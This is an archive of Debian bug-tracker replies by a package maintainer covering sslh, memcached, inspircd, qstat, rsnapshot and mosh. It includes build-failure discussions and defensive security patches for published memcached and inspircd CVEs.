Hi, On Sat, 6 May 2017 20:57:44 +0200 Adam Borowski <kilob...@angband.pl> wrote: > On Sat, May 06, 2017 at 08:00:11PM +0200, Michael Stapelberg wrote: > > Thanks. It seems like getaddrinfo() is returning two results when resolving > > localhost. Can you provide the contents of your hostname resolution-related > > configuration please? I.e., /etc/hosts, /etc/resolv.conf, > > /etc/nsswitch.conf, anything else you might have tweaked in that area. > > nsswitch.conf: always default. > > > amd64 (100% fails on all chroots): > .--[ /etc/hosts ] > 127.0.0.1 localhost > 127.0.1.1 umbar.angband.plumbar > #lots of commented out stuff > > # The following lines are desirable for IPv6 capable hosts > ::1 localhost ip6-localhost ip6-loopback > ff02::1 ip6-allnodes > ff02::2 ip6-allrouters > +--[ /etc/resolv.conf ] > domain angband.pl > search angband.pl > nameserver 2001:6a0:118::3:2 > ` > > armhf (100% fails on all chroots): > .--[ /etc/hosts ] > 127.0.0.1 localhost > ::1 localhost ip6-localhost ip6-loopback > fe00::0 ip6-localnet > ff00::0 ip6-mcastprefix > ff02::1 ip6-allnodes > ff02::2 ip6-allrouters > > 127.0.0.1 kholdankholdan.angband.pl > 2001:6a0:118::3:6 narchost > #2001:6a0:118::3:3apt.angband.pl > +--[ /etc/resolv.conf ] > domain angband.pl > search angband.pl > nameserver 10.0.1.2 > ` > > arm64 (100% ok on all chroots): > .--[ /etc/hosts ] > 127.0.0.1 localhost > 127.0.1.1 sirius.angband.pl sirius > > # The following lines are desirable for IPv6 capable hosts > ::1 localhost ip6-localhost ip6-loopback > fe00::0 ip6-localnet > ff00::0 ip6-mcastprefix > ff02::1 ip6-allnodes > ff02::2 ip6-allrouters > +--[ /etc/resolv.conf ] > domain angband.pl > nameserver 10.0.1.2 > nameserver 2001:6a0:118::3:2 > ` > I've also spent time to reproduce this and despite my attempt to disable localhost IPv6 resolution [0], i already encountered issues for echosrv on ::1. You can also try to replace any occurrence of `localhost` on t file by 127.0.0.1. If the testsuite cause trouble, i'll disable IPv6 completely even on loopback (i didn't like the idea at first glance because want to keep the testsuite as close as upstream ship it). Then, any other special configurations in /etc/gai.conf ? [0]: https://anonscm.debian.org/cgit/collab-maint/sslh.git/tree/debian/patches/ftbfs_localhost.diff -- Guillaume Delacour signature.asc Description: OpenPGP digital signature
Bug#856568: memcached: Permission error creating pidfile with systemd
tags 856568 moreinfo thanks Hi, On Thu, Mar 02, 2017 at 04:04:33PM +0100, Teun wrote: > After adding the option: "-P /var/run/memcached.pid" to '/etc/memcached.conf', > I get the following error: > > systemd-memcached-wrapper[2577]: Could not open the pid file > /var/run/memcached.pid.tmp for writing: Permission denied > Is there any reason to have a pid file for a systemd managed service ? Systemd handle well the crash of the process in case of crash: # pkill -9 memcached # service memcached status ● memcached.service - memcached daemon Loaded: loaded (/lib/systemd/system/memcached.service; enabled) Active: failed (Result: signal) since Tue 2017-03-21 23:12:47 GMT; 2s ago Process: 4204 ExecStart=/usr/share/memcached/scripts/systemd-memcached-wrapper /etc/memcached.conf (code=killed, signal=KILL) Main PID: 4204 (code=killed, signal=KILL) Mar 21 23:11:46 jessie systemd[1]: Started memcached daemon. Mar 21 23:12:47 jessie systemd[1]: memcached.service: main process exited, code=killed, status=9/KILL Mar 21 23:12:47 jessie systemd[1]: Unit memcached.service entered failed state. As systemd official doc says [1][2], it is recommended to use PIDFile if the service forks and exit at startup. Systemd wrapper script does not exit after startup and can run in foreground. [1]: https://www.freedesktop.org/software/systemd/man/systemd.service.html#Type= [2]: https://www.freedesktop.org/software/systemd/man/systemd.service.html#PIDFile= -- Guillaume Delacour signature.asc Description: Digital signature
Bug#853544: memcached: ftbfs with GCC-7
tags 853544 upstream fixed-upstream thanks On Tue, 31 Jan 2017 09:33:50 + Matthias Klose <d...@debian.org> wrote: > items.c:730:45: error: '%d' directive output truncated writing between 10 and > 11 bytes into a region of size 8 [-Werror=format-truncation=] > snprintf(key, sizeof(key), "%d", i * 32); > ^~ > items.c:730:44: note: using the range [-2147483648, 2147483647] for directive > argument > snprintf(key, sizeof(key), "%d", i * 32); > ^~~~ > In file included from /usr/include/stdio.h:938:0, > from /usr/include/event2/event.h:195, > from /usr/include/event.h:71, > from memcached.h:16, > from items.c:2: > /usr/include/x86_64-linux-gnu/bits/stdio2.h:64:10: note: format output > between 11 and 12 bytes into a destination of size 8 >return __builtin___snprintf_chk (__s, __n, __USE_FORTIFY_LEVEL - 1, > ^~~~ > __bos (__s), __fmt, __va_arg_pack ()); > ~ > items.c: In function 'item_stats_sizes': > items.c:730:45: error: '%d' directive output truncated writing between 10 and > 11 bytes into a region of size 8 [-Werror=format-truncation=] > snprintf(key, sizeof(key), "%d", i * 32); > ^~ > items.c:730:44: note: using the range [-2147483648, 2147483647] for directive > argument > snprintf(key, sizeof(key), "%d", i * 32); > ^~~~ > In file included from /usr/include/stdio.h:938:0, > from /usr/include/event2/event.h:195, > from /usr/include/event.h:71, > from memcached.h:16, All is now fine with release 1.4.36 (https://github.com/memcached/memcached/commit/64bbbf4c7655a540247db4b608b00f809742f24b), will be released after the freeze in unstable. -- Guillaume Delacour signature.asc Description: OpenPGP digital signature
Bug#842812: memcached: CVE-2016-8705
Fix is the same as #842814. On Tue, 01 Nov 2016 14:05:19 +0100 Salvatore Bonaccorso <car...@debian.org> wrote: > Source: memcached > Version: 1.4.31-1 > Severity: important > Tags: security upstream > > Hi, > > the following vulnerability was published for memcached. > > CVE-2016-8705[0]: > Memcached Server Update Remote Code Execution Vulnerability > > It is reproducible with the (fixed) reproducer on the TALOS site, when > running under valgrind easily. > > If you fix the vulnerability please also make sure to include the > CVE (Common Vulnerabilities & Exposures) id in your changelog entry. > > For further information see: > > [0] https://security-tracker.debian.org/tracker/CVE-2016-8705 > [1] http://www.talosintelligence.com/reports/TALOS-2016-0220/ > > Please adjust the affected versions in the BTS as needed. > > Regards, > Salvatore > > -- Guillaume Delacour signature.asc Description: OpenPGP digital signature
Bug#842811: memcached: CVE-2016-8704
Fix is the same as for #842814. On Tue, 01 Nov 2016 14:00:07 +0100 Salvatore Bonaccorso <car...@debian.org> wrote: > Source: memcached > Version: 1.4.31-1 > Severity: important > Tags: security upstream > > Hi, > > the following vulnerability was published for memcached. > > CVE-2016-8704[0]: > Memcached Server Append/Prepend Remote Code Execution Vulnerability > > If you fix the vulnerability please also make sure to include the > CVE (Common Vulnerabilities & Exposures) id in your changelog entry. > > For further information see: > > [0] https://security-tracker.debian.org/tracker/CVE-2016-8704 > [1] http://www.talosintelligence.com/reports/TALOS-2016-0219/ > > Please adjust the affected versions in the BTS as needed. > > Regards, > Salvatore > > -- Guillaume Delacour signature.asc Description: OpenPGP digital signature
Bug#842814: memcached: CVE-2016-8706
Please see attached the debdiff. Also, please note that i can't upload myself to security-master as i'm not a DD nor DM. On Tue, 01 Nov 2016 14:08:44 +0100 Salvatore Bonaccorso <car...@debian.org> wrote: > Source: memcached > Version: 1.4.31-1 > Severity: important > Tags: security upstream > > Hi, > > the following vulnerability was published for memcached. > > CVE-2016-8706[0]: > |Memcached Server SASL Autentication Remote Code Execution > |Vulnerability > > It is easily reproducible with the TALOS reproducer when memcached > enabled SASL authentication and running under valgrind to see the > crash. > > If you fix the vulnerability please also make sure to include the > CVE (Common Vulnerabilities & Exposures) id in your changelog entry. > > For further information see: > > [0] https://security-tracker.debian.org/tracker/CVE-2016-8706 > [1] http://www.talosintelligence.com/reports/TALOS-2016-0221/ > > Please adjust the affected versions in the BTS as needed. > > Regards, > Salvatore > > -- Guillaume Delacour diff -Nru memcached-1.4.21/debian/changelog memcached-1.4.21/debian/changelog --- memcached-1.4.21/debian/changelog 2015-03-07 13:01:25.0 + +++ memcached-1.4.21/debian/changelog 2016-11-03 02:14:20.0 + @@ -1,3 +1,12 @@ +memcached (1.4.21-1.1+deb8u1) jessie-security; urgency=high + + * CVE-2016-8704: Fix Append/Prepend Remote Code Execution (Closes: #842811) + * CVE-2016-8705: Fix Update Remote Code Execution (Closes: #842812) + * CVE-2016-8706: Fix SASL Authentication Remote Code Execution +(Closes: #842814) + + -- Guillaume Delacour <g...@iroqwa.org> Thu, 03 Nov 2016 02:26:55 +0100 + memcached (1.4.21-1.1) unstable; urgency=medium * Non-maintainer upload. diff -Nru memcached-1.4.21/debian/patches/08_CVE-2016-8704_8705_8706.patch memcached-1.4.21/debian/patches/08_CVE-2016-8704_8705_8706.patch --- memcached-1.4.21/debian/patches/08_CVE-2016-8704_8705_8706.patch 1970-01-01 00:00:00.0 + +++ memcached-1.4.21/debian/patches/08_CVE-2016-8704_8705_8706.patch 2016-11-03 01:31:47.0 + @@ -0,0 +1,50 @@ +From bd578fc34b96abe0f8d99c1409814a09f51ee71c Mon Sep 17 00:00:00 2001 +From: dormando <dorma...@rydia.net> +Date: Wed, 12 Oct 2016 13:50:47 -0700 +Subject: [PATCH] CVE reported by cisco talos +Origin: upstream, +https://github.com/memcached/memcached/commit/bd578fc34b96abe0f8d99c1409814a09f51ee71c +Last-Update: 2016-11-03 + +--- + items.c | 3 +++ + memcached.c | 10 -- + 2 files changed, 11 insertions(+), 2 deletions(-) + +diff --git a/items.c b/items.c +index 9e6d921..a1cca4a 100644 +--- a/items.c b/items.c +@@ -148,6 +148,9 @@ item *do_item_alloc(char *key, const size_t nkey, const unsigned int flags, + uint8_t nsuffix; + item *it = NULL; + char suffix[40]; ++if (nbytes < 2 || nkey < 0) ++return 0; ++ + size_t ntotal = item_make_header(nkey + 1, flags, nbytes, suffix, ); + if (settings.use_cas) { + ntotal += sizeof(uint64_t); +diff --git a/memcached.c b/memcached.c +index dc1f636..ad423a0 100644 +--- a/memcached.c b/memcached.c +@@ -1997,10 +1997,16 @@ static bool authenticated(conn *c) { + static void dispatch_bin_command(conn *c) { + int protocol_error = 0; + +-int extlen = c->binary_header.request.extlen; +-int keylen = c->binary_header.request.keylen; ++uint8_t extlen = c->binary_header.request.extlen; ++uint16_t keylen = c->binary_header.request.keylen; + uint32_t bodylen = c->binary_header.request.bodylen; + ++if (keylen > bodylen || keylen + extlen > bodylen) { ++write_bin_error(c, PROTOCOL_BINARY_RESPONSE_UNKNOWN_COMMAND, NULL, 0); ++c->write_and_go = conn_closing; ++return; ++} ++ + if (settings.sasl && !authenticated(c)) { + write_bin_error(c, PROTOCOL_BINARY_RESPONSE_AUTH_ERROR, NULL, 0); + c->write_and_go = conn_closing; diff -Nru memcached-1.4.21/debian/patches/series memcached-1.4.21/debian/patches/series --- memcached-1.4.21/debian/patches/series 2015-03-07 13:01:25.0 + +++ memcached-1.4.21/debian/patches/series 2016-11-03 01:32:38.0 + @@ -4,3 +4,4 @@ 04_add_init_retry.patch 06_eol_comment_handling.patch 07_disable_tests.patch +08_CVE-2016-8704_8705_8706.patch signature.asc Description: OpenPGP digital signature
Bug#836706: certificate spoofing via crafted SASL messages
Please see attached the debdiff. Also, please note that i can't upload myself to security-master as i'm not a DD nor DM. Le 06/09/2016 à 00:02, Guillaume Delacour a écrit : > > > Le 05/09/2016 à 22:41, James Lu a écrit : >> Hi, > > Hi, > >> >> Just to narrow things down a bit, the relevant fix for InspIRCd 2.0 is >> this commit >> https://github.com/inspircd/inspircd/commit/74fafb7f11b06747f69f182ad5e3769b665eea7a > > Yes, i've talked to upstream a few hours ago to include this particular > fix to 2.0.17; upload of 2.0.23 will follow to unstable. > >> >> Best, >> James >> > -- Guillaume Delacour diff -Nru inspircd-2.0.17/debian/changelog inspircd-2.0.17/debian/changelog --- inspircd-2.0.17/debian/changelog2016-03-22 19:31:22.0 +0100 +++ inspircd-2.0.17/debian/changelog2016-09-06 21:29:13.0 +0200 @@ -1,3 +1,10 @@ +inspircd (2.0.17-1+deb8u2) jessie-security; urgency=high + + * m_sasl: don't allow AUTHENTICATE with mechanisms with a space +(CVE-2016-7142) + + -- Guillaume Delacour <g...@iroqwa.org> Tue, 06 Sep 2016 01:58:19 +0200 + inspircd (2.0.17-1+deb8u1) jessie-security; urgency=high * Non-maintainer upload by the Wheezy LTS Team. diff -Nru inspircd-2.0.17/debian/patches/CVE-2016-7142.patch inspircd-2.0.17/debian/patches/CVE-2016-7142.patch --- inspircd-2.0.17/debian/patches/CVE-2016-7142.patch 1970-01-01 01:00:00.0 +0100 +++ inspircd-2.0.17/debian/patches/CVE-2016-7142.patch 2016-09-06 21:29:13.0 +0200 @@ -0,0 +1,31 @@ +From 74fafb7f11b06747f69f182ad5e3769b665eea7a Mon Sep 17 00:00:00 2001 +From: Adam <a...@anope.org> +Date: Fri, 2 Sep 2016 22:57:03 -0400 +Subject: [PATCH] m_sasl: don't allow AUTHENTICATE with mechanisms with a space + +--- + src/modules/m_sasl.cpp | 4 + 1 file changed, 4 insertions(+) + +diff --git a/src/modules/m_sasl.cpp b/src/modules/m_sasl.cpp +index 9cb5592..16a1535 100644 +--- a/src/modules/m_sasl.cpp b/src/modules/m_sasl.cpp +@@ -189,6 +189,7 @@ class CommandAuthenticate : public Command + : Command(Creator, "AUTHENTICATE", 1), authExt(ext), cap(Cap) + { + works_before_reg = true; ++ allow_empty_last_param = false; + } + + CmdResult Handle (const std::vector& parameters, User *user) +@@ -199,6 +200,9 @@ class CommandAuthenticate : public Command + if (!cap.ext.get(user)) + return CMD_FAILURE; + ++ if (parameters[0].find(' ') != std::string::npos || parameters[0][0] == ':') ++ return CMD_FAILURE; ++ + SaslAuthenticator *sasl = authExt.get(user); + if (!sasl) + authExt.set(user, new SaslAuthenticator(user, parameters[0])); diff -Nru inspircd-2.0.17/debian/patches/series inspircd-2.0.17/debian/patches/series --- inspircd-2.0.17/debian/patches/series 2016-03-22 19:29:23.0 +0100 +++ inspircd-2.0.17/debian/patches/series 2016-09-06 22:55:05.0 +0200 @@ -2,3 +2,4 @@ 01_dpkg-buildflags_support.diff 03_gnutls_crypt_api_instead_gcrypt.diff CVE-2015-8702.patch +CVE-2016-7142.patch signature.asc Description: OpenPGP digital signature
Bug#836706: certificate spoofing via crafted SASL messages
Le 05/09/2016 à 22:41, James Lu a écrit : > Hi, Hi, > > Just to narrow things down a bit, the relevant fix for InspIRCd 2.0 is > this commit > https://github.com/inspircd/inspircd/commit/74fafb7f11b06747f69f182ad5e3769b665eea7a Yes, i've talked to upstream a few hours ago to include this particular fix to 2.0.17; upload of 2.0.23 will follow to unstable. > > Best, > James > -- Guillaume Delacour signature.asc Description: OpenPGP digital signature
Bug#790275: qstat: FTBFS with glibc 2.21 and gcc-5
On Sat, 31 Oct 2015 15:15:33 +0100 Guillaume Delacour <g...@iroqwa.org> wrote: > > Upstream seems to have modified qstat.c to include strndup() only if > needed in recent version of qstat : > > https://github.com/multiplay/qstat/commit/9977e09cebc340208ab097f8db619ebc80756859 I've uploaded a fix on mentors: http://mentors.debian.net/debian/pool/main/q/qstat/qstat_2.15-2.dsc. I'm waiting for Jordi for uploading it in the archive. -- Guillaume Delacour signature.asc Description: OpenPGP digital signature
Bug#809008: inspircd: FTBFS: rmdir: failed to remove '[..]/debian/inspircd/usr/lib/inspircd/data': No such file or directory
retitle 809008 "FTBFS with perl 5.22: Calling POSIX::tmpnam() is deprecated" thanks Le 26/12/2015 04:26, Chris Lamb a écrit : > Source: inspircd > Version: 2.0.20-4 > Severity: serious > Justification: fails to build from source > User: reproducible-bui...@lists.alioth.debian.org > Usertags: ftbfs > X-Debbugs-Cc: reproducible-bui...@lists.alioth.debian.org > > Dear Maintainer, > > inspircd fails to build from source in unstable/amd64: > > [..] > # delete empty data and log dir > rmdir > /home/lamby/temp/cdt.20151226032303.NJlegBmZbO/inspircd-2.0.20/debian/inspircd/usr/lib/inspircd/data > \ > > /home/lamby/temp/cdt.20151226032303.NJlegBmZbO/inspircd-2.0.20/debian/inspircd/usr/lib/inspircd/logs > rmdir: failed to remove > '/home/lamby/temp/cdt.20151226032303.NJlegBmZbO/inspircd-2.0.20/debian/inspircd/usr/lib/inspircd/data': > No such file or directory > rmdir: failed to remove > '/home/lamby/temp/cdt.20151226032303.NJlegBmZbO/inspircd-2.0.20/debian/inspircd/usr/lib/inspircd/logs': > No such file or directory > debian/rules:51: recipe for target 'override_dh_auto_install' failed > make[1]: *** [override_dh_auto_install] Error 1 > make[1]: Leaving directory > '/home/lamby/temp/cdt.20151226032303.NJlegBmZbO/inspircd-2.0.20' > debian/rules:81: recipe for target 'binary' failed > make: *** [binary] Error 2 > > [..] > > The full build log is attached. The real problem is: [...] Evaluating perl code for module [1;32mm_pgsql.cpp[0m ... Configuration failed. The following error occured: Calling POSIX::tmpnam() is deprecated at make/utilities.pm line 407, line 32. [...] Upstream use POSIX::tmpnam in this file which seems (i don't find any other pointer than [1]) to be deprecated since perl 5.22; i 'll propose them to use File::Temp instead and prepare a new -4 version. [1]: https://metacpan.org/pod/distribution/perl/ext/POSIX/lib/POSIX.pod#FUNCTIONS -- Guillaume Delacour signature.asc Description: OpenPGP digital signature
Bug#784357: memcached multi instance startup/shutdown broken
tags 784357 +help Hi, On Wed, 16 Dec 2015 14:26:38 -0500 Jonathan Champ <roya...@gmail.com> wrote: > Ran into this again today. Hope there's been some progress? Not for the moment, i'm sorry that the only way i can propose for now is to create one unit systemd file per instance needed. I'll try to find a solution in the middle of January. -- Guillaume Delacour signature.asc Description: OpenPGP digital signature
Bug#804010: New version 1.0.1 available
On Wed, Nov 04, 2015 at 09:16:04AM +0100, Sebastien Bacher wrote: > Package: gdisk > Version: 1.0.0-3 > > There is a new 1.0.1 version available that fixes some EFI issues and > potential segfaults on some architectures, it would be nice to have that > update in Debian Sure, i've prepared this package a few days ago on mentors: http://mentors.debian.net/debian/pool/main/g/gdisk/gdisk_1.0.1-1.dsc My main sponsor doesn't reply me yet, you can review the package and upload it if you have some time. Thanks in advance. -- Guillaume Delacour signature.asc Description: Digital signature
Bug#789860: php5-imagick: Segmentation fault when accessing an unknown property
fixed 789860 3.2.0~rc1-1 thanks Hi, It is seems to be unreproducible in versions: - 3.2.0~rc1-1 (stable) - 3.3.0~rc2-1 (testing/unstable) Le 24/06/2015 23:37, Jerry a écrit : > Package: php5-imagick > Version: 3.1.0~rc1-1+b2 > Severity: normal > > The following code produces a segmentation fault: > > $im = new \Imagick; > $im->foo; > ?> > > It can also be reproduces on the command line: > > jerry@box:~$ php -r '$im = new \Imagick(); $im->foo;' > Segmentation fault > > -- System Information: > Debian Release: 7.8 > APT prefers oldstable-updates > APT policy: (500, 'oldstable-updates'), (500, 'oldstable') > Architecture: i386 (i686) > > Kernel: Linux 2.6.32-30-pve (SMP w/2 CPU cores) > Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) > Shell: /bin/sh linked to /bin/dash > > Versions of packages php5-imagick depends on: > ii libc6 2.13-38+deb7u8 > ii libmagickcore5 8:6.7.7.10-5+deb7u3 > ii libmagickwand5 8:6.7.7.10-5+deb7u3 > ii php5-cli [phpapi-20100525+lfs] 5.4.41-0+deb7u1 > ii php5-common 5.4.41-0+deb7u1 > ii php5-fpm [phpapi-20100525+lfs] 5.4.41-0+deb7u1 > ii ucf 3.0025+nmu3 > > Versions of packages php5-imagick recommends: > ii ghostscript 9.05~dfsg-6.3+deb7u1 > ii ttf-dejavu-core 2.33-3 > > php5-imagick suggests no packages. > > -- no debconf information > -- Guillaume Delacour signature.asc Description: OpenPGP digital signature
Bug#790275: qstat: FTBFS with glibc 2.21 and gcc-5
tag 790275 fixed-upstream thanks On Sat, 27 Jun 2015 13:08:22 -0700 Daniel Schepler <dschep...@gmail.com> wrote: > Source: qstat > Version: 2.15-1 > Severity: normal > > From my pbuilder build log, using a setup preferring glibc and gcc-defaults > from experimental: > > ... > gcc -DHAVE_CONFIG_H -I. -Dsysconfdir=\"/etc\" -D_FORTIFY_SOURCE=2 -DDEBUG > -DENABLE_DUMP -g -O2 -fstack-protector-strong -Wformat > -Werror=format-security -Wall -c -o md5.o md5.c > gcc -DHAVE_CONFIG_H -I. -Dsysconfdir=\"/etc\" -D_FORTIFY_SOURCE=2 -DDEBUG > -DENABLE_DUMP -g -O2 -fstack-protector-strong -Wformat > -Werror=format-security -Wall -c -o qserver.o qserver.c > gcc -DHAVE_CONFIG_H -I. -Dsysconfdir=\"/etc\" -D_FORTIFY_SOURCE=2 -DDEBUG > -DENABLE_DUMP -g -O2 -fstack-protector-strong -Wformat > -Werror=format-security -Wall -c -o qstat.o qstat.c > In file included from /usr/include/string.h:634:0, > from qstat.c:31: > qstat.c:2633:7: error: expected identifier or '(' before '__extension__' > char *strndup(const char *string, size_t len); >^ > qstat.c: In function 'do_work': > qstat.c:3104:18: warning: variable 'fd' set but not used > [-Wunused-but-set-variable] > int pktlen, rc, fd; > ^ > qstat.c: In function 'deal_with_ghostrecon_packet': > qstat.c:9789:26: warning: variable 'end' set but not used > [-Wunused-but-set-variable] > char str[256], *start, *end, StartFlag, *lpszIgnoreServerPlayer; > ^ > qstat.c:9789:18: warning: variable 'start' set but not used > [-Wunused-but-set-variable] > char str[256], *start, *end, StartFlag, *lpszIgnoreServerPlayer; > ^ > In file included from /usr/include/string.h:634:0, > from qstat.c:31: > qstat.c: At top level: > qstat.c:12121:7: error: expected identifier or '(' before '__extension__' > char *strndup(const char *string, size_t len) Upstream seems to have modified qstat.c to include strndup() only if needed in recent version of qstat : https://github.com/multiplay/qstat/commit/9977e09cebc340208ab097f8db619ebc80756859 >^ > Makefile:543: recipe for target 'qstat.o' failed > make[3]: *** [qstat.o] Error 1 > make[3]: Leaving directory '/tmp/buildd/qstat-2.15' > Makefile:580: recipe for target 'all-recursive' failed > make[2]: *** [all-recursive] Error 1 > make[2]: Leaving directory '/tmp/buildd/qstat-2.15' > Makefile:397: recipe for target 'all' failed > make[1]: *** [all] Error 2 > make[1]: Leaving directory '/tmp/buildd/qstat-2.15' > dh_auto_build: make -j1 returned exit code 2 > debian/rules:4: recipe for target 'build' failed > make: *** [build] Error 2 > dpkg-buildpackage: error: debian/rules build gave error exit status 2 > E: Failed autobuilding of package > -- > Daniel Schepler > > -- Guillaume Delacour signature.asc Description: OpenPGP digital signature
Bug#800650: Create development header packages
Le 02/10/2015 08:09, Michael D a écrit : > Package: inspircd > Severity: |wishlist| > > Hi All, > > I was wondering if there was any interest in creating an inspircd-dev > package that simply copies over the include/ folder to > /usr/include/inspircd/ ? This can be useful if there is some other (external ?) extensions that need to be compiled for inspircd. I have enabled most (if not all) extensions provided as modules [1], do you have example of external module ? [1]: http://sources.debian.net/src/inspircd/2.0.20-3/debian/rules/#L19-L24 > Should be simple enough, I can include a patch if really needed. > -- Guillaume Delacour signature.asc Description: OpenPGP digital signature
Bug#784915: jessie-pu: package rsnapshot/1.3.1-4
Hi, Le 21/08/2015 16:34, Adam D. Barratt a écrit : > > The package in unstable and testing appears to have been fixed now. > >> In either case, when it comes to an update in stable we'll need a source >> debdiff of the proposed updated package, built and tested in a Jessie >> environment, rather than pointers to online patches. > > This is still true, however. Please find attached a debdiff that fix the problem in Jessie. I've tested the fix by defining ssh_args in /etc/rsnapshot.conf and it's works well after the fix (before applying the update rsnapshot fails with "rsync: Failed to exec /usr/bin/ssh -p222: No such file or directory"). > > Regards, > > Adam > -- Guillaume Delacour diff -Nru rsnapshot-1.3.1/debian/changelog rsnapshot-1.3.1/debian/changelog --- rsnapshot-1.3.1/debian/changelog2013-07-08 22:54:57.0 +0200 +++ rsnapshot-1.3.1/debian/changelog2015-10-25 23:39:03.0 +0100 @@ -1,3 +1,13 @@ +rsnapshot (1.3.1-4+deb8u1) jessie; urgency=medium + + * debian/patches/14_fix_rsh_args: fix regression on --rsh with args: +Applied patch from Upstream to fix --rsh command line arguments with quotes. +The --rsh=... argument to rsync was erroneously quoted when added to the +@rsync_long_args_stack with options set. Thanks Jonas Genannt for the +help. + + -- Guillaume Delacour <g...@iroqwa.org> Sun, 25 Oct 2015 23:33:28 +0100 + rsnapshot (1.3.1-4) unstable; urgency=low * debian/patches/01_rsnapshot_conf: Refresh patch to fix path of rsnapshot in diff -Nru rsnapshot-1.3.1/debian/patches/14_fix_rsh_args.diff rsnapshot-1.3.1/debian/patches/14_fix_rsh_args.diff --- rsnapshot-1.3.1/debian/patches/14_fix_rsh_args.diff 1970-01-01 01:00:00.0 +0100 +++ rsnapshot-1.3.1/debian/patches/14_fix_rsh_args.diff 2015-10-25 23:38:18.0 +0100 @@ -0,0 +1,18 @@ +From: Edwin Mons <g...@home.mons.net> +Date: Wed, 18 Sep 2013 22:39:11 +0200 +Subject: Fix rsync --rsh command line arguments with quotes +Bug: https://github.com/rsnapshot/rsnapshot/commit/30380587aeab201311af9428f7c47621ade691c8 + +diff --git a/rsnapshot-program.pl b/rsnapshot-program.pl +index 85972fd..5a20d0b 100755 +--- a/rsnapshot-program.pl b/rsnapshot-program.pl +@@ -3412,7 +3412,7 @@ sub rsync_backup_point { + + # if we have any args for SSH, add them + if ( defined($ssh_args) ) { +- push( @rsync_long_args_stack, "--rsh=\"$config_vars{'cmd_ssh'} $ssh_args\"" ); ++ push( @rsync_long_args_stack, "--rsh=$config_vars{'cmd_ssh'} $ssh_args" ); + + # no arguments is the default + } else { diff -Nru rsnapshot-1.3.1/debian/patches/series rsnapshot-1.3.1/debian/patches/series --- rsnapshot-1.3.1/debian/patches/series 2013-07-08 22:27:41.0 +0200 +++ rsnapshot-1.3.1/debian/patches/series 2015-10-25 23:33:09.0 +0100 @@ -8,3 +8,4 @@ 11_lvm_snapshots.diff 12_include_conf_with_arguments.diff 13_print_warn.diff +14_fix_rsh_args.diff signature.asc Description: OpenPGP digital signature
Bug#789835: memcached: FTBFS in sid: timeout in t/lru-crawler.t
On Mon, 29 Jun 2015 22:40:01 +0200 Guillaume Delacour g...@iroqwa.org wrote: This package FTBFS in a clean sid sbuild setup: t/line-lengths.t . ok Timeout.. killing the process t/lru-crawler.t .. Failed 126/221 subtests Seems to be a random issue that affect other distributions (i'm quite sure to have been reproduced at least one time a long time ago, but wrongly guess this was my env): http://forums.famillecollet.com/viewtopic.php?id=3165 https://code.google.com/p/memcached/issues/detail?id=398 http://webcache.googleusercontent.com/search?q=cache:2j2npL8eOAMJ:https://arch-ci.org/extra/memcached/log/+cd=10hl=frct=clnk I've opened issue on upstream googlecode (as GitHub memcached space don't let me create issues) to have his point of view about this issue. Upstream and i don't reproduce the problem, do you ? I tried to iterate around 250 times on this test and never reproduce this. $ while true ; do prove t/lru-crawler.t ; done If you reproduce it, don't hesitate to give me as much details as possible to reproduce myself/upstream to fix this issue. -- Guillaume Delacour signature.asc Description: OpenPGP digital signature
Bug#717451: Backups broken when ssh_args are set
fixed 717451 1.4.0-1 thanks On Wed, 15 Jul 2015 19:42:21 -0400 Michel synth17+deb-b...@gmail.com wrote: Package: rsnapshot Version: 1.3.1-7 Followup-For: Bug #717451 Dear Maintainer, After upgrading rsnapshot to 1.3.1-7, remote backups still fail. Local backups work as expected. The upgrade occurred on 06/24/2015, and every remote backup since then have failed. Have been extremely busy and have not checked local email, until today. To my surprise, have no remote backups since 06/24. I've pushed the 1.4.0-1 release that fix that kind of problem. Feel free to reopen if it is not the case. -- Guillaume Delacour signature.asc Description: OpenPGP digital signature
Bug#686956: incompatible with sslh
reassign 686956 mosh fixed 686956 1.2.4.95rc2-1 thanks Hi, I'm reassigning this bug only to mosh and document the version which include the binding option. On Tue, 30 Apr 2013 10:05:21 -0400 Keith Winstein kei...@mit.edu wrote: This is fixed in git (adding a new mosh option, --bind-server=ANY) and will be in the next release. On Fri, Sep 7, 2012 at 12:12 PM, chrysn chr...@fsfe.org wrote: Package: mosh, sslh Severity: minor mosh can't be used on hosts that hide their ssh services behind sslh. when connecting to such a host, mosh displays mosh: Nothing received from server on UDP port 60001. then: mosh: Nothing received from server on UDP port 60001. (... s without contact) the problem seems to be caused by the way the ssh connection is established in sslh: sslh forwards the connection by creating another tcp stream from itself to the ssh server, causing SSH_CONNECTION have 127.0.0.1 in both source and destination ip fields -- and mosh, when started with -s, binds to the address it finds in SSH_CONNECTION. the mosh server seems to get started with -s automatically (even though the client seems to just call mosh-server, it shows up in the process list as `mosh-server new -s ...`). several solutions seem feasible, in increasing order of my preference: * provide a way for the client to specify he doesn't want to use the `-s` option server-side (fix on mosh side) * have a server-side configuration option to turn off the `-s` flag for the host (better, as it has to be done only once per host) (fix on mosh side) * provide a way to find out the real address (fix on ssh side) as a workaround, i have provided a way around sslh for clients to connect directly, but that's not usually what an sslh user wants to do. -- System Information: Debian Release: wheezy/sid APT prefers unstable APT policy: (500, 'unstable'), (1, 'experimental') Architecture: amd64 (x86_64) Foreign Architectures: i386 Kernel: Linux 3.4-trunk-amd64 (SMP w/2 CPU cores) Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Versions of packages mosh depends on: ii libc6 2.13-35 ii libgcc1 1:4.7.1-7 ii libio-pty-perl 1:1.08-1+b2 ii libprotobuf72.4.1-3 ii libstdc++6 4.7.1-7 ii libtinfo5 5.9-10 signature.asc Description: OpenPGP digital signature
Bug#789835: memcached: FTBFS in sid: timeout in t/lru-crawler.t
